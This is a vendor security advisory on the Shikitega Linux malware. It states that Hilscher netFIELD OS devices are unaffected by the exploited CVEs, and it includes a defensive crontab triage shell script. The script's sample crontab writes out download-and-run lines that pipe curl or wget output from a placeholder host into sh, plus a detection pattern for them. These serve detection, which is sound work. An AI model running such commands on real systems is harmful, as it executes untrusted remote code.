2022-09-12 Shikitega Linux Malware Exploit

Title: Shikitega Linux Malware Exploit

Reporter: https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux

Hilscher Ticket: -

Affects: not affected

Not affected:

NIOT-E-TIJCX-GB-RE
NIOT-E-TPI51-EN-RE
NIOT-E-NPI3-EN
NIOT-E-NPI3-51-EN-RE
NIOT-E-NPI3-EN
NFS-M8-QM-D2-N16
NFX8M-D2-N32-010

Impact: None

CVSS: 0

Severity: NONE

Last modified:


General Vulnerability Description

Short Description

Researchers at AT&T Alien Labs have discovered a new Linux malware called Shikitega that infects Linux systems in a stealthy manner. With additional payloads, the primary targets of this malware are Linux-based systems and IoT devices.

Detailed Description

The malware exploits vulnerabilities to elevate privileges and adds persistence to the host through crontab. As a result of the infection, a cryptocurrency miner is later installed on the infected device. Shikitega exploits CVE-2021-4034 and CVE-2021-3493 for privilege escalation. Successful exploitation of the vulnerability allows an attacker with local network access to gain elevated privileges.

Corrective Action or Resolution

Hilscher Linux-based devices are not affected by the Shikitega vulnerability.

CVE-2021-3493 is Ubuntu specific and is not included in Hilscher's Yocto Project-based custom Linux "netFIELD OS".

A patch for CVE-2021-4034 will be included in netFIELD OS version 2.4.x.x and higher. In any case, there is no attack vector in "netFIELD OS" versions lower than 2.4.x.x.
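For Linux hosts other than the devices listed above, the conditions named in this advisory can be checked with a short triage script. This is an added example, not Hilscher's or AT&T's tooling; the function names, the cron patterns (generic review heuristics, not Shikitega signatures) and the sample crontab are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: triage for the preconditions and persistence named above.

# CVE-2021-3493 is Ubuntu specific: succeed if the os-release file says Ubuntu.
is_ubuntu() {
    [ -r "$1" ] && grep -Eq '^ID="?ubuntu"?$' "$1"
}

# CVE-2021-4034 is in polkit's pkexec, which only matters for privilege
# escalation when the binary is installed with the setuid bit.
pkexec_is_setuid() {
    [ -f "$1" ] && [ -u "$1" ]
}

# Read crontab text on stdin and print active entries worth a manual review:
# download-and-run pipelines, or programs referenced in world-writable dirs.
suspicious_cron() {
    grep -Ev '^[[:space:]]*(#|$)' |
    grep -E '(curl|wget)[^|;&]*[|;&]+[[:space:]]*(ba)?sh|[[:space:]]/(tmp|var/tmp|dev/shm)/'
}

# Constructed sample crontab (not taken from a real infection).
sample_cron() {
    cat <<'EOF'
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
@reboot /var/tmp/.cache/worker >/dev/null 2>&1
*/10 * * * * curl -s http://example.invalid/u.sh | sh
#*/5 * * * * wget -q http://example.invalid/x.sh; sh x.sh
EOF
}

echo "Entries flagged in the constructed sample:"
sample_cron | suspicious_cron

# Host checks: report only, change nothing.
if is_ubuntu /etc/os-release; then
    echo "Ubuntu host: confirm the kernel carries the CVE-2021-3493 fix"
fi
p=$(command -v pkexec || true)
if [ -n "$p" ] && pkexec_is_setuid "$p"; then
    echo "setuid pkexec at $p: confirm polkit carries the CVE-2021-4034 fix"
fi
```

To review a real host, pipe `crontab -l` for each user, `/etc/crontab` and the files under `/etc/cron.d` into `suspicious_cron`; a hit is a prompt for manual review, not proof of infection.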

Workaround

No action needed

Disclaimer

The security advisory and information contained herein, are provided on an "as is" basis and do not imply any kind of guarantee or warranty, including the warranties of merchantability or fitness for a particular use. The information in this advisory should not be construed as a commitment by Hilscher. In no event shall Hilscher be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, nor shall Hilscher be liable for incidental or consequential damages arising from use of any software or hardware described in this advisory.
Hilscher provides no warranty, express or implied, for the information contained in this document, and assumes no responsibility for the information contained in this document or for any errors that may appear in this document. Your use of the advisory and information contained herein, or materials linked from the advisory, is at your own risk.  Information in this advisory and any related communications is based on our knowledge at the time of publication and is subject to change without notice. Hilscher reserves the right to change or update advisories at any time.